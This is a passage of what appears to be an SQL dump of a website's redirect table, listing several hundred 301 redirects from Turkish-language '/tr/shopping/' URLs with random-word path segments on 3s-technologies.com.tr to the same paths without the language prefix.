00:00:00',301),(72863,'https://3s-technologies.com.tr/tr/shopping/aculeated/968640588.html',NULL,'https://3s-technologies.com.tr/shopping/aculeated/968640588.html','',1,0,'2026-06-11 05:04:10','0000-00-00 00:00:00',301),(72864,'https://3s-technologies.com.tr/tr/shopping/geometric/3610562016.html',NULL,'https://3s-technologies.com.tr/shopping/geometric/3610562016.html','',1,0,'2026-06-11 05:04:13','0000-00-00 00:00:00',301),(72865,'https://3s-technologies.com.tr/tr/shopping/stith/912871691.html',NULL,'https://3s-technologies.com.tr/shopping/stith/912871691.html','',1,0,'2026-06-11 05:04:16','0000-00-00 00:00:00',301),(72866,'https://3s-technologies.com.tr/tr/shopping/improgressively/1682988220.html',NULL,'https://3s-technologies.com.tr/shopping/improgressively/1682988220.html','',1,0,'2026-06-11 05:04:19','0000-00-00 00:00:00',301),(72867,'https://3s-technologies.com.tr/tr/shopping/bashfulness/3133584371.html',NULL,'https://3s-technologies.com.tr/shopping/bashfulness/3133584371.html','',1,0,'2026-06-11 05:04:22','0000-00-00 00:00:00',301),(72868,'https://3s-technologies.com.tr/tr/shopping/protestator/3006455599.html',NULL,'https://3s-technologies.com.tr/shopping/protestator/3006455599.html','',1,0,'2026-06-11 05:04:25','0000-00-00 00:00:00',301),(72869,'https://3s-technologies.com.tr/tr/shopping/caving/3199048241.html',NULL,'https://3s-technologies.com.tr/shopping/caving/3199048241.html','',1,0,'2026-06-11 05:04:28','0000-00-00 00:00:00',301),(72870,'https://3s-technologies.com.tr/tr/shopping/cornific/3994331813.html',NULL,'https://3s-technologies.com.tr/shopping/cornific/3994331813.html','',1,0,'2026-06-11 05:04:31','0000-00-00 00:00:00',301),(72871,'https://3s-technologies.com.tr/tr/shopping/pompous/35035478.html',NULL,'https://3s-technologies.com.tr/shopping/pompous/35035478.html','',1,0,'2026-06-11 05:04:34','0000-00-00 00:00:00',301),(72872,'https://3s-technologies.com.tr/tr/shopping/macrocephaly/4010348137.html',NULL,'https://3s-technologies.com.tr/shopping/macrocephaly/4010348137.html','',1,0,'2026-06-11 05:04:37','0000-00-00 00:00:00',301),(72873,'https://3s-technologies.com.tr/tr/shopping/downstroke/3069897604.html',NULL,'https://3s-technologies.com.tr/shopping/downstroke/3069897604.html','',1,0,'2026-06-11 05:04:40','0000-00-00 00:00:00',301),(72874,'https://3s-technologies.com.tr/tr/shopping/invincible/3226528974.html',NULL,'https://3s-technologies.com.tr/shopping/invincible/3226528974.html','',1,0,'2026-06-11 05:04:43','0000-00-00 00:00:00',301),(72875,'https://3s-technologies.com.tr/tr/shopping/epulation/1600481019.html',NULL,'https://3s-technologies.com.tr/shopping/epulation/1600481019.html','',1,0,'2026-06-11 05:04:46','0000-00-00 00:00:00',301),(72876,'https://3s-technologies.com.tr/tr/shopping/oleraceus/4233996294.html',NULL,'https://3s-technologies.com.tr/shopping/oleraceus/4233996294.html','',1,0,'2026-06-11 05:04:51','0000-00-00 00:00:00',301),(72877,'https://3s-technologies.com.tr/tr/shopping/alone/1417507364.html',NULL,'https://3s-technologies.com.tr/shopping/alone/1417507364.html','',1,0,'2026-06-11 05:04:54','0000-00-00 00:00:00',301),(72878,'https://3s-technologies.com.tr/tr/shopping/excommunicator/2813926645.html',NULL,'https://3s-technologies.com.tr/shopping/excommunicator/2813926645.html','',1,0,'2026-06-11 05:04:57','0000-00-00 00:00:00',301),(72879,'https://3s-technologies.com.tr/tr/shopping/absent/731543046.html',NULL,'https://3s-technologies.com.tr/shopping/absent/731543046.html','',1,0,'2026-06-11 05:05:00','0000-00-00 00:00:00',301),(72880,'https://3s-technologies.com.tr/tr/shopping/charioting/2346088933.html',NULL,'https://3s-technologies.com.tr/shopping/charioting/2346088933.html','',1,0,'2026-06-11 05:05:03','0000-00-00 00:00:00',301),(72881,'https://3s-technologies.com.tr/tr/shopping/easterling/3683348206.html',NULL,'https://3s-technologies.com.tr/shopping/easterling/3683348206.html','',1,0,'2026-06-11 05:05:06','0000-00-00 00:00:00',301),(72882,'https://3s-technologies.com.tr/tr/shopping/unactive/2995902401.html',NULL,'https://3s-technologies.com.tr/shopping/unactive/2995902401.html','',1,0,'2026-06-11 05:05:09','0000-00-00 00:00:00',301),(72883,'https://3s-technologies.com.tr/tr/shopping/violably/1508495250.html',NULL,'https://3s-technologies.com.tr/shopping/violably/1508495250.html','',1,0,'2026-06-11 05:05:12','0000-00-00 00:00:00',301),(72884,'https://3s-technologies.com.tr/tr/shopping/thomboides/2811502463.html',NULL,'https://3s-technologies.com.tr/shopping/thomboides/2811502463.html','',1,0,'2026-06-11 05:05:15','0000-00-00 00:00:00',301),(72885,'https://3s-technologies.com.tr/tr/shopping/placable/2316623240.html',NULL,'https://3s-technologies.com.tr/shopping/placable/2316623240.html','',1,0,'2026-06-11 05:05:18','0000-00-00 00:00:00',301),(72886,'https://3s-technologies.com.tr/tr/shopping/mesally/1597182467.html',NULL,'https://3s-technologies.com.tr/shopping/mesally/1597182467.html','',1,0,'2026-06-11 05:05:21','0000-00-00 00:00:00',301),(72887,'https://3s-technologies.com.tr/tr/shopping/utopianism/1521339653.html',NULL,'https://3s-technologies.com.tr/shopping/utopianism/1521339653.html','',1,0,'2026-06-11 05:05:24','0000-00-00 00:00:00',301),(72888,'https://3s-technologies.com.tr/tr/shopping/imitancy/2616643207.html',NULL,'https://3s-technologies.com.tr/shopping/imitancy/2616643207.html','',1,0,'2026-06-11 05:05:27','0000-00-00 00:00:00',301),(72889,'https://3s-technologies.com.tr/tr/shopping/traverser/3705368002.html',NULL,'https://3s-technologies.com.tr/shopping/traverser/3705368002.html','',1,0,'2026-06-11 05:05:30','0000-00-00 00:00:00',301),(72890,'https://3s-technologies.com.tr/tr/shopping/caird/3693294255.html',NULL,'https://3s-technologies.com.tr/shopping/caird/3693294255.html','',1,0,'2026-06-11 05:05:33','0000-00-00 00:00:00',301),(72891,'https://3s-technologies.com.tr/tr/shopping/depravity/915036265.html',NULL,'https://3s-technologies.com.tr/shopping/depravity/915036265.html','',1,0,'2026-06-11 05:05:36','0000-00-00 00:00:00',301),(72892,'https://3s-technologies.com.tr/tr/shopping/inapplication/2123954651.html',NULL,'https://3s-technologies.com.tr/shopping/inapplication/2123954651.html','',1,0,'2026-06-11 05:05:39','0000-00-00 00:00:00',301),(72893,'https://3s-technologies.com.tr/tr/shopping/attribution/3077382563.html',NULL,'https://3s-technologies.com.tr/shopping/attribution/3077382563.html','',1,0,'2026-06-11 05:05:42','0000-00-00 00:00:00',301),(72894,'https://3s-technologies.com.tr/tr/shopping/schismless/322896328.html',NULL,'https://3s-technologies.com.tr/shopping/schismless/322896328.html','',1,0,'2026-06-11 05:05:45','0000-00-00 00:00:00',301),(72895,'https://3s-technologies.com.tr/tr/shopping/corols/3219807489.html',NULL,'https://3s-technologies.com.tr/shopping/corols/3219807489.html','',1,0,'2026-06-11 05:05:48','0000-00-00 00:00:00',301),(72896,'https://3s-technologies.com.tr/tr/shopping/frequently/1337025101.html',NULL,'https://3s-technologies.com.tr/shopping/frequently/1337025101.html','',1,0,'2026-06-11 05:05:51','0000-00-00 00:00:00',301),(72897,'https://3s-technologies.com.tr/tr/shopping/microzyme/2674362510.html',NULL,'https://3s-technologies.com.tr/shopping/microzyme/2674362510.html','',1,0,'2026-06-11 05:05:54','0000-00-00 00:00:00',301),(72898,'https://3s-technologies.com.tr/tr/shopping/clicket/3919574467.html',NULL,'https://3s-technologies.com.tr/shopping/clicket/3919574467.html','',1,0,'2026-06-11 05:06:03','0000-00-00 00:00:00',301),(72899,'https://3s-technologies.com.tr/tr/shopping/overpowering/1309723998.html',NULL,'https://3s-technologies.com.tr/shopping/overpowering/1309723998.html','',1,0,'2026-06-11 05:06:05','0000-00-00 00:00:00',301),(72900,'https://3s-technologies.com.tr/tr/shopping/cornmuse/1285366673.html',NULL,'https://3s-technologies.com.tr/shopping/cornmuse/1285366673.html','',1,0,'2026-06-11 05:06:08','0000-00-00 00:00:00',301),(72901,'https://3s-technologies.com.tr/tr/shopping/phalaropus/2662934974.html',NULL,'https://3s-technologies.com.tr/shopping/phalaropus/2662934974.html','',1,0,'2026-06-11 05:06:11','0000-00-00 00:00:00',301),(72902,'https://3s-technologies.com.tr/tr/shopping/highlow/1067301582.html',NULL,'https://3s-technologies.com.tr/shopping/highlow/1067301582.html','',1,0,'2026-06-11 05:06:14','0000-00-00 00:00:00',301),(72903,'https://3s-technologies.com.tr/tr/shopping/cittern/3140760896.html',NULL,'https://3s-technologies.com.tr/shopping/cittern/3140760896.html','',1,0,'2026-06-11 05:06:17','0000-00-00 00:00:00',301),(72904,'https://3s-technologies.com.tr/tr/shopping/emplastic/1078680621.html',NULL,'https://3s-technologies.com.tr/shopping/emplastic/1078680621.html','',1,0,'2026-06-11 05:06:20','0000-00-00 00:00:00',301),(72905,'https://3s-technologies.com.tr/tr/shopping/ragingly/1427320436.html',NULL,'https://3s-technologies.com.tr/shopping/ragingly/1427320436.html','',1,0,'2026-06-11 05:06:23','0000-00-00 00:00:00',301),(72906,'https://3s-technologies.com.tr/tr/shopping/commaterial/302001062.html',NULL,'https://3s-technologies.com.tr/shopping/commaterial/302001062.html','',1,0,'2026-06-11 05:06:26','0000-00-00 00:00:00',301),(72907,'https://3s-technologies.com.tr/tr/shopping/discreditable/3010966218.html',NULL,'https://3s-technologies.com.tr/shopping/discreditable/3010966218.html','',1,0,'2026-06-11 05:06:29','0000-00-00 00:00:00',301),(72908,'https://3s-technologies.com.tr/tr/shopping/repedation/1928465838.html',NULL,'https://3s-technologies.com.tr/shopping/repedation/1928465838.html','',1,0,'2026-06-11 05:06:32','0000-00-00 00:00:00',301),(72909,'https://3s-technologies.com.tr/tr/shopping/snuffling/770954788.html',NULL,'https://3s-technologies.com.tr/shopping/snuffling/770954788.html','',1,0,'2026-06-11 05:06:35','0000-00-00 00:00:00',301),(72910,'https://3s-technologies.com.tr/tr/shopping/belee/4191890966.html',NULL,'https://3s-technologies.com.tr/shopping/belee/4191890966.html','',1,0,'2026-06-11 05:06:38','0000-00-00 00:00:00',301),(72911,'https://3s-technologies.com.tr/tr/shopping/opportunely/24693426.html',NULL,'https://3s-technologies.com.tr/shopping/opportunely/24693426.html','',1,0,'2026-06-11 05:06:41','0000-00-00 00:00:00',301),(72912,'https://3s-technologies.com.tr/tr/shopping/elementary/1819478857.html',NULL,'https://3s-technologies.com.tr/shopping/elementary/1819478857.html','',1,0,'2026-06-11 05:06:44','0000-00-00 00:00:00',301),(72913,'https://3s-technologies.com.tr/tr/shopping/deathroll/3487520732.html',NULL,'https://3s-technologies.com.tr/shopping/deathroll/3487520732.html','',1,0,'2026-06-11 05:06:48','0000-00-00 00:00:00',301),(72914,'https://3s-technologies.com.tr/tr/shopping/simulatory/2658346170.html',NULL,'https://3s-technologies.com.tr/shopping/simulatory/2658346170.html','',1,0,'2026-06-11 05:06:50','0000-00-00 00:00:00',301),(72915,'https://3s-technologies.com.tr/tr/shopping/reforesting/2566360417.html',NULL,'https://3s-technologies.com.tr/shopping/reforesting/2566360417.html','',1,0,'2026-06-11 05:06:53','0000-00-00 00:00:00',301),(72916,'https://3s-technologies.com.tr/tr/shopping/glimpse/4022585423.html',NULL,'https://3s-technologies.com.tr/shopping/glimpse/4022585423.html','',1,0,'2026-06-11 05:06:56','0000-00-00 00:00:00',301),(72917,'https://3s-technologies.com.tr/tr/shopping/postcava/3600008818.html',NULL,'https://3s-technologies.com.tr/shopping/postcava/3600008818.html','',1,0,'2026-06-11 05:06:59','0000-00-00 00:00:00',301),(72918,'https://3s-technologies.com.tr/tr/shopping/gotama/3704155903.html',NULL,'https://3s-technologies.com.tr/shopping/gotama/3704155903.html','',1,0,'2026-06-11 05:07:03','0000-00-00 00:00:00',301),(72919,'https://3s-technologies.com.tr/tr/shopping/orientalized/1776641964.html',NULL,'https://3s-technologies.com.tr/shopping/orientalized/1776641964.html','',1,0,'2026-06-11 05:07:05','0000-00-00 00:00:00',301),(72920,'https://3s-technologies.com.tr/tr/shopping/compositions/839356990.html',NULL,'https://3s-technologies.com.tr/shopping/compositions/839356990.html','',1,0,'2026-06-11 05:07:08','0000-00-00 00:00:00',301),(72921,'https://3s-technologies.com.tr/tr/shopping/branching/4026221704.html',NULL,'https://3s-technologies.com.tr/shopping/branching/4026221704.html','',1,0,'2026-06-11 05:07:11','0000-00-00 00:00:00',301),(72922,'https://3s-technologies.com.tr/tr/shopping/wrathless/722280100.html',NULL,'https://3s-technologies.com.tr/shopping/wrathless/722280100.html','',1,0,'2026-06-11 05:07:14','0000-00-00 00:00:00',301),(72923,'https://3s-technologies.com.tr/tr/shopping/considerately/1970610212.html',NULL,'https://3s-technologies.com.tr/shopping/considerately/1970610212.html','',1,0,'2026-06-11 05:07:17','0000-00-00 00:00:00',301),(72924,'https://3s-technologies.com.tr/tr/shopping/leaping/3588454651.html',NULL,'https://3s-technologies.com.tr/shopping/leaping/3588454651.html','',1,0,'2026-06-11 05:07:20','0000-00-00 00:00:00',301),(72925,'https://3s-technologies.com.tr/tr/shopping/malonic/4289677622.html',NULL,'https://3s-technologies.com.tr/shopping/malonic/4289677622.html','',1,0,'2026-06-11 05:07:23','0000-00-00 00:00:00',301),(72926,'https://3s-technologies.com.tr/tr/shopping/gypse/1110129085.html',NULL,'https://3s-technologies.com.tr/shopping/gypse/1110129085.html','',1,0,'2026-06-11 05:07:26','0000-00-00 00:00:00',301),(72927,'https://3s-technologies.com.tr/tr/shopping/sircar/2678470780.html',NULL,'https://3s-technologies.com.tr/shopping/sircar/2678470780.html','',1,0,'2026-06-11 05:07:29','0000-00-00 00:00:00',301),(72928,'https://3s-technologies.com.tr/tr/shopping/healed/2289455114.html',NULL,'https://3s-technologies.com.tr/shopping/healed/2289455114.html','',1,0,'2026-06-11 05:07:32','0000-00-00 00:00:00',301),(72929,'https://3s-technologies.com.tr/tr/shopping/doling/1683151743.html',NULL,'https://3s-technologies.com.tr/shopping/doling/1683151743.html','',1,0,'2026-06-11 05:07:35','0000-00-00 00:00:00',301),(72930,'https://3s-technologies.com.tr/tr/shopping/planer/3459430645.html',NULL,'https://3s-technologies.com.tr/shopping/planer/3459430645.html','',1,0,'2026-06-11 05:07:38','0000-00-00 00:00:00',301),(72931,'https://3s-technologies.com.tr/tr/shopping/wicket/327004598.html',NULL,'https://3s-technologies.com.tr/shopping/wicket/327004598.html','',1,0,'2026-06-11 05:07:41','0000-00-00 00:00:00',301),(72932,'https://3s-technologies.com.tr/tr/shopping/streit/2306281172.html',NULL,'https://3s-technologies.com.tr/shopping/streit/2306281172.html','',1,0,'2026-06-11 05:07:44','0000-00-00 00:00:00',301),(72933,'https://3s-technologies.com.tr/tr/shopping/amend/3549042909.html',NULL,'https://3s-technologies.com.tr/shopping/amend/3549042909.html','',1,0,'2026-06-11 05:07:47','0000-00-00 00:00:00',301),(72934,'https://3s-technologies.com.tr/tr/shopping/birring/208743130.html',NULL,'https://3s-technologies.com.tr/shopping/birring/208743130.html','',1,0,'2026-06-11 05:07:54','0000-00-00 00:00:00',301),(72935,'https://3s-technologies.com.tr/tr/shopping/holocentridae/2321537100.html',NULL,'https://3s-technologies.com.tr/shopping/holocentridae/2321537100.html','',1,0,'2026-06-11 05:07:57','0000-00-00 00:00:00',301),(72936,'https://3s-technologies.com.tr/tr/shopping/warming/1393373028.html',NULL,'https://3s-technologies.com.tr/shopping/warming/1393373028.html','',1,0,'2026-06-11 05:08:00','0000-00-00 00:00:00',301),(72937,'https://3s-technologies.com.tr/tr/shopping/disparity/893563570.html',NULL,'https://3s-technologies.com.tr/shopping/disparity/893563570.html','',1,0,'2026-06-11 05:08:04','0000-00-00 00:00:00',301),(72938,'https://3s-technologies.com.tr/tr/shopping/nervate/984446990.html',NULL,'https://3s-technologies.com.tr/shopping/nervate/984446990.html','',1,0,'2026-06-11 05:08:06','0000-00-00 00:00:00',301),(72939,'https://3s-technologies.com.tr/tr/shopping/boohooed/1963097166.html',NULL,'https://3s-technologies.com.tr/shopping/boohooed/1963097166.html','',1,0,'2026-06-11 05:08:09','0000-00-00 00:00:00',301),(72940,'https://3s-technologies.com.tr/tr/shopping/phasianellus/814344051.html',NULL,'https://3s-technologies.com.tr/shopping/phasianellus/814344051.html','',1,0,'2026-06-11 05:08:12','0000-00-00 00:00:00',301),(72941,'https://3s-technologies.com.tr/tr/shopping/ellipse/212360711.html',NULL,'https://3s-technologies.com.tr/shopping/ellipse/212360711.html','',1,0,'2026-06-11 05:08:15','0000-00-00 00:00:00',301),(72942,'https://3s-technologies.com.tr/tr/shopping/glooming/1909725775.html',NULL,'https://3s-technologies.com.tr/shopping/glooming/1909725775.html','',1,0,'2026-06-11 05:08:19','0000-00-00 00:00:00',301),(72943,'https://3s-technologies.com.tr/tr/shopping/succise/851987222.html',NULL,'https://3s-technologies.com.tr/shopping/succise/851987222.html','',1,0,'2026-06-11 05:08:21','0000-00-00 00:00:00',301),(72944,'https://3s-technologies.com.tr/tr/shopping/gazette/1662412812.html',NULL,'https://3s-technologies.com.tr/shopping/gazette/1662412812.html','',1,0,'2026-06-11 05:08:30','0000-00-00 00:00:00',301),(72945,'https://3s-technologies.com.tr/tr/shopping/bestrid/3792705696.html',NULL,'https://3s-technologies.com.tr/shopping/bestrid/3792705696.html','',1,0,'2026-06-11 05:08:31','0000-00-00 00:00:00',301),(72946,'https://3s-technologies.com.tr/tr/shopping/lawer/3358574924.html',NULL,'https://3s-technologies.com.tr/shopping/lawer/3358574924.html','',1,0,'2026-06-11 05:08:34','0000-00-00 00:00:00',301),(72947,'https://3s-technologies.com.tr/tr/shopping/osteology/2332630193.html',NULL,'https://3s-technologies.com.tr/shopping/osteology/2332630193.html','',1,0,'2026-06-11 05:08:38','0000-00-00 00:00:00',301),(72948,'https://3s-technologies.com.tr/tr/shopping/symbological/1197226525.html',NULL,'https://3s-technologies.com.tr/shopping/symbological/1197226525.html','',1,0,'2026-06-11 05:08:40','0000-00-00 00:00:00',301),(72949,'https://3s-technologies.com.tr/tr/shopping/mainsheet/940762024.html',NULL,'https://3s-technologies.com.tr/shopping/mainsheet/940762024.html','',1,0,'2026-06-11 05:08:43','0000-00-00 00:00:00',301),(72950,'https://3s-technologies.com.tr/tr/shopping/touraco/2029571099.html',NULL,'https://3s-technologies.com.tr/shopping/touraco/2029571099.html','',1,0,'2026-06-11 05:08:46','0000-00-00 00:00:00',301),(72951,'https://3s-technologies.com.tr/tr/shopping/unmechanize/3356969425.html',NULL,'https://3s-technologies.com.tr/shopping/unmechanize/3356969425.html','',1,0,'2026-06-11 05:08:49','0000-00-00 00:00:00',301),(72952,'https://3s-technologies.com.tr/tr/shopping/tunnage/2954960272.html',NULL,'https://3s-technologies.com.tr/shopping/tunnage/2954960272.html','',1,0,'2026-06-11 05:08:52','0000-00-00 00:00:00',301),(72953,'https://3s-technologies.com.tr/tr/shopping/sancebell/816931788.html',NULL,'https://3s-technologies.com.tr/shopping/sancebell/816931788.html','',1,0,'2026-06-11 05:08:55','0000-00-00 00:00:00',301),(72954,'https://3s-technologies.com.tr/tr/shopping/breath/1274709387.html',NULL,'https://3s-technologies.com.tr/shopping/breath/1274709387.html','',1,0,'2026-06-11 05:08:58','0000-00-00 00:00:00',301),(72955,'https://3s-technologies.com.tr/tr/shopping/aponeurotic/2293641131.html',NULL,'https://3s-technologies.com.tr/shopping/aponeurotic/2293641131.html','',1,0,'2026-06-11 05:09:01','0000-00-00 00:00:00',301),(72956,'https://3s-technologies.com.tr/tr/shopping/agood/1599095994.html',NULL,'https://3s-technologies.com.tr/shopping/agood/1599095994.html','',1,0,'2026-06-11 05:09:04','0000-00-00 00:00:00',301),(72957,'https://3s-technologies.com.tr/tr/shopping/lunet/3648283353.html',NULL,'https://3s-technologies.com.tr/shopping/lunet/3648283353.html','',1,0,'2026-06-11 05:09:07','0000-00-00 00:00:00',301),(72958,'https://3s-technologies.com.tr/tr/shopping/caesura/2632338099.html',NULL,'https://3s-technologies.com.tr/shopping/caesura/2632338099.html','',1,0,'2026-06-11 05:09:10','0000-00-00 00:00:00',301),(72959,'https://3s-technologies.com.tr/tr/shopping/parsnip/2366077509.html',NULL,'https://3s-technologies.com.tr/shopping/parsnip/2366077509.html','',1,0,'2026-06-11 05:09:13','0000-00-00 00:00:00',301),(72960,'https://3s-technologies.com.tr/tr/shopping/revokingly/2527810556.html',NULL,'https://3s-technologies.com.tr/shopping/revokingly/2527810556.html','',1,0,'2026-06-11 05:09:16','0000-00-00 00:00:00',301),(72961,'https://3s-technologies.com.tr/tr/shopping/directorship/136277021.html',NULL,'https://3s-technologies.com.tr/shopping/directorship/136277021.html','',1,0,'2026-06-11 05:09:19','0000-00-00 00:00:00',301),(72962,'https://3s-technologies.com.tr/tr/shopping/bewitchment/3457718470.html',NULL,'https://3s-technologies.com.tr/shopping/bewitchment/3457718470.html','',1,0,'2026-06-11 05:09:22','0000-00-00 00:00:00',301),(72963,'https://3s-technologies.com.tr/tr/shopping/sternum/473411163.html',NULL,'https://3s-technologies.com.tr/shopping/sternum/473411163.html','',1,0,'2026-06-11 05:09:25','0000-00-00 00:00:00',301),(72964,'https://3s-technologies.com.tr/tr/shopping/bicorn/2511798700.html',NULL,'https://3s-technologies.com.tr/shopping/bicorn/2511798700.html','',1,0,'2026-06-11 05:09:33','0000-00-00 00:00:00',301),(72965,'https://3s-technologies.com.tr/tr/shopping/reimplant/225458611.html',NULL,'https://3s-technologies.com.tr/shopping/reimplant/225458611.html','',1,0,'2026-06-11 05:09:35','0000-00-00 00:00:00',301),(72966,'https://3s-technologies.com.tr/tr/shopping/pahoehoe/3651791141.html',NULL,'https://3s-technologies.com.tr/shopping/pahoehoe/3651791141.html','',1,0,'2026-06-11 05:09:38','0000-00-00 00:00:00',301),(72967,'https://3s-technologies.com.tr/tr/shopping/legionary/195551491.html',NULL,'https://3s-technologies.com.tr/shopping/legionary/195551491.html','',1,0,'2026-06-11 05:09:41','0000-00-00 00:00:00',301),(72968,'https://3s-technologies.com.tr/tr/shopping/metapeptone/1190604230.html',NULL,'https://3s-technologies.com.tr/shopping/metapeptone/1190604230.html','',1,0,'2026-06-11 05:09:44','0000-00-00 00:00:00',301),(72969,'https://3s-technologies.com.tr/tr/shopping/belle/2253932539.html',NULL,'https://3s-technologies.com.tr/shopping/belle/2253932539.html','',1,0,'2026-06-11 05:09:47','0000-00-00 00:00:00',301),(72970,'https://3s-technologies.com.tr/tr/shopping/semaphorist/1140850420.html',NULL,'https://3s-technologies.com.tr/shopping/semaphorist/1140850420.html','',1,0,'2026-06-11 05:09:50','0000-00-00 00:00:00',301),(72971,'https://3s-technologies.com.tr/tr/shopping/disobeyer/3383221168.html',NULL,'https://3s-technologies.com.tr/shopping/disobeyer/3383221168.html','',1,0,'2026-06-11 05:09:53','0000-00-00 00:00:00',301),(72972,'https://3s-technologies.com.tr/tr/shopping/mycobacteria/1978257504.html',NULL,'https://3s-technologies.com.tr/shopping/mycobacteria/1978257504.html','',1,0,'2026-06-11 05:09:56','0000-00-00 00:00:00',301),(72973,'https://3s-technologies.com.tr/tr/shopping/subcalibre/1348504942.html',NULL,'https://3s-technologies.com.tr/shopping/subcalibre/1348504942.html','',1,0,'2026-06-11 05:09:59','0000-00-00 00:00:00',301),(72974,'https://3s-technologies.com.tr/tr/shopping/purveyor/3550495462.html',NULL,'https://3s-technologies.com.tr/shopping/purveyor/3550495462.html','',1,0,'2026-06-11 05:10:02','0000-00-00 00:00:00',301),(72975,'https://3s-technologies.com.tr/tr/shopping/manualist/2953910912.html',NULL,'https://3s-technologies.com.tr/shopping/manualist/2953910912.html','',1,0,'2026-06-11 05:10:05','0000-00-00 00:00:00',301),(72976,'https://3s-technologies.com.tr/tr/shopping/glassgazing/3706984094.html',NULL,'https://3s-technologies.com.tr/shopping/glassgazing/3706984094.html','',1,0,'2026-06-11 05:10:09','0000-00-00 00:00:00',301),(72977,'https://3s-technologies.com.tr/tr/shopping/milkweed/1044203492.html',NULL,'https://3s-technologies.com.tr/shopping/milkweed/1044203492.html','',1,0,'2026-06-11 05:10:12','0000-00-00 00:00:00',301),(72978,'https://3s-technologies.com.tr/tr/shopping/treacherousness/3303542076.html',NULL,'https://3s-technologies.com.tr/shopping/treacherousness/3303542076.html','',1,0,'2026-06-11 05:10:19','0000-00-00 00:00:00',301),(72979,'https://3s-technologies.com.tr/tr/shopping/ladybirds/1603979420.html',NULL,'https://3s-technologies.com.tr/shopping/ladybirds/1603979420.html','',1,0,'2026-06-11 05:10:21','0000-00-00 00:00:00',301),(72980,'https://3s-technologies.com.tr/tr/shopping/vicargeneral/4047326267.html',NULL,'https://3s-technologies.com.tr/shopping/vicargeneral/4047326267.html','',1,0,'2026-06-11 05:10:24','0000-00-00 00:00:00',301),(72981,'https://3s-technologies.com.tr/tr/shopping/filipinos/551019248.html',NULL,'https://3s-technologies.com.tr/shopping/filipinos/551019248.html','',1,0,'2026-06-11 05:10:27','0000-00-00 00:00:00',301),(72982,'https://3s-technologies.com.tr/tr/shopping/rondeau/2672060008.html',NULL,'https://3s-technologies.com.tr/shopping/rondeau/2672060008.html','',1,0,'2026-06-11 05:10:30','0000-00-00 00:00:00',301),(72983,'https://3s-technologies.com.tr/tr/shopping/saberbill/3059466118.html',NULL,'https://3s-technologies.com.tr/shopping/saberbill/3059466118.html','',1,0,'2026-06-11 05:10:33','0000-00-00 00:00:00',301),(72984,'https://3s-technologies.com.tr/tr/shopping/swartish/2490461991.html',NULL,'https://3s-technologies.com.tr/shopping/swartish/2490461991.html','',1,0,'2026-06-11 05:10:36','0000-00-00 00:00:00',301),(72985,'https://3s-technologies.com.tr/tr/shopping/bedeckedpredicate/189587081.html',NULL,'https://3s-technologies.com.tr/shopping/bedeckedpredicate/189587081.html','',1,0,'2026-06-11 05:10:39','0000-00-00 00:00:00',301),(72986,'https://3s-technologies.com.tr/tr/shopping/carman/2921052551.html',NULL,'https://3s-technologies.com.tr/shopping/carman/2921052551.html','',1,0,'2026-06-11 05:10:42','0000-00-00 00:00:00',301),(72987,'https://3s-technologies.com.tr/tr/shopping/scalenohedral/3669309718.html',NULL,'https://3s-technologies.com.tr/shopping/scalenohedral/3669309718.html','',1,0,'2026-06-11 05:10:45','0000-00-00 00:00:00',301),(72988,'https://3s-technologies.com.tr/tr/shopping/replantation/1618147362.html',NULL,'https://3s-technologies.com.tr/shopping/replantation/1618147362.html','',1,0,'2026-06-11 05:10:48','0000-00-00 00:00:00',301),(72989,'https://3s-technologies.com.tr/tr/shopping/aerolithology/2798174790.html',NULL,'https://3s-technologies.com.tr/shopping/aerolithology/2798174790.html','',1,0,'2026-06-11 05:10:54','0000-00-00 00:00:00',301),(72990,'https://3s-technologies.com.tr/tr/shopping/psychopannychism/1730094186.html',NULL,'https://3s-technologies.com.tr/shopping/psychopannychism/1730094186.html','',1,0,'2026-06-11 05:10:58','0000-00-00 00:00:00',301),(72991,'https://3s-technologies.com.tr/tr/shopping/fussbudgety/1952693767.html',NULL,'https://3s-technologies.com.tr/shopping/fussbudgety/1952693767.html','',1,0,'2026-06-11 05:11:00','0000-00-00 00:00:00',301),(72992,'https://3s-technologies.com.tr/tr/shopping/cultural/2140256210.html',NULL,'https://3s-technologies.com.tr/shopping/cultural/2140256210.html','',1,0,'2026-06-11 05:11:07','0000-00-00 00:00:00',301),(72993,'https://3s-technologies.com.tr/tr/shopping/hygieist/3129117311.html',NULL,'https://3s-technologies.com.tr/shopping/hygieist/3129117311.html','',1,0,'2026-06-11 05:11:10','0000-00-00 00:00:00',301),(72994,'https://3s-technologies.com.tr/tr/shopping/sudoral/2548229772.html',NULL,'https://3s-technologies.com.tr/shopping/sudoral/2548229772.html','',1,0,'2026-06-11 05:11:13','0000-00-00 00:00:00',301),(72995,'https://3s-technologies.com.tr/tr/shopping/zincked/2163158853.html',NULL,'https://3s-technologies.com.tr/shopping/zincked/2163158853.html','',1,0,'2026-06-11 05:11:19','0000-00-00 00:00:00',301),(72996,'https://3s-technologies.com.tr/tr/shopping/machinedrivenadj/2473599057.html',NULL,'https://3s-technologies.com.tr/shopping/machinedrivenadj/2473599057.html','',1,0,'2026-06-11 05:11:21','0000-00-00 00:00:00',301),(72997,'https://3s-technologies.com.tr/tr/shopping/commensalism/1534264539.html',NULL,'https://3s-technologies.com.tr/shopping/commensalism/1534264539.html','',1,0,'2026-06-11 05:11:24','0000-00-00 00:00:00',301),(72998,'https://3s-technologies.com.tr/tr/shopping/sourdoughprenominal/932549923.html',NULL,'https://3s-technologies.com.tr/shopping/sourdoughprenominal/932549923.html','',1,0,'2026-06-11 05:11:28','0000-00-00 00:00:00',301),(72999,'https://3s-technologies.com.tr/tr/shopping/sanhita/1530724311.html',NULL,'https://3s-technologies.com.tr/shopping/sanhita/1530724311.html','',1,0,'2026-06-11 05:11:30','0000-00-00 00:00:00',301),(73000,'https://3s-technologies.com.tr/tr/shopping/photochromy/3662133209.html',NULL,'https://3s-technologies.com.tr/shopping/photochromy/3662133209.html','',1,0,'2026-06-11 05:11:33','0000-00-00 00:00:00',301),(73001,'https://3s-technologies.com.tr/tr/shopping/betrothed/1220284139.html',NULL,'https://3s-technologies.com.tr/shopping/betrothed/1220284139.html','',1,0,'2026-06-11 05:11:37','0000-00-00 00:00:00',301),(73002,'https://3s-technologies.com.tr/tr/shopping/arenicolous/1039121206.html',NULL,'https://3s-technologies.com.tr/shopping/arenicolous/1039121206.html','',1,0,'2026-06-11 05:11:39','0000-00-00 00:00:00',301),(73003,'https://3s-technologies.com.tr/tr/shopping/dressiness/2874838953.html',NULL,'https://3s-technologies.com.tr/shopping/dressiness/2874838953.html','',1,0,'2026-06-11 05:11:42','0000-00-00 